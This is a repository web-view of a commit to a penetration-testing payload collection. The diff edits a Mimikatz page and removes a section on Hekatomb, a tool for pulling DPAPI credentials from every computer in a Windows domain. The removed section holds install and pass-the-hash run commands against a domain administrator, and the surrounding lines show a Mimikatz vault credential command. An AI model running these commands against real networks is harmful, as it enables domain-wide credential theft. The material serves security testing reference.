admin/PayloadsAllTHINGS
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

DPAPI - Data Protection API

Browse Source
This commit is contained in:
Swissky
2022-09-23 00:35:34 +02:00
parent 6b76c452a7
commit 2d30e22121
5 changed files with 145 additions and 49 deletions
Download Patch File Download Diff File Expand all files Collapse all files

19
Methodology and Resources/Windows - Mimikatz.md
View File

@@ -14,7 +14,6 @@
* [Chrome Cookies & Credential](#chrome-cookies--credential)
* [Task Scheduled credentials](#task-scheduled-credentials)
* [Vault](#vault)
* [Hekatomb - Steal all credentials on domain](#hekatomb---Steal-all-credentials-on-domain)
* [Mimikatz - Commands list](#mimikatz---commands-list)
* [Mimikatz - Powershell version](#mimikatz---powershell-version)
* [References](#references)
@@ -236,24 +235,6 @@ Attributes : 0
vault::cred /in:C:\Users\demo\AppData\Local\Microsoft\Vault\"
```
### Hekatomb - Steal all credentials on domain
> Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations.
> Then it will download all DPAPI blob of all users from all computers.
> Finally, it will extract domain controller private key through RPC uses it to decrypt all credentials.
```python
pip3 install hekatomb
hekatomb -hashes :ed0052e5a66b1c8e942cc9481a50d56 DOMAIN.local/administrator@10.0.0.1 -debug -dnstcp
```
<a href="https://github.com/Processus-Thief/HEKATOMB">https://github.com/Processus-Thief/HEKATOMB</a>
![Data in memory](https://github.com/Processus-Thief/HEKATOMB/raw/main/.assets/github1.png)
## Mimikatz - Commands list
| Command |Definition|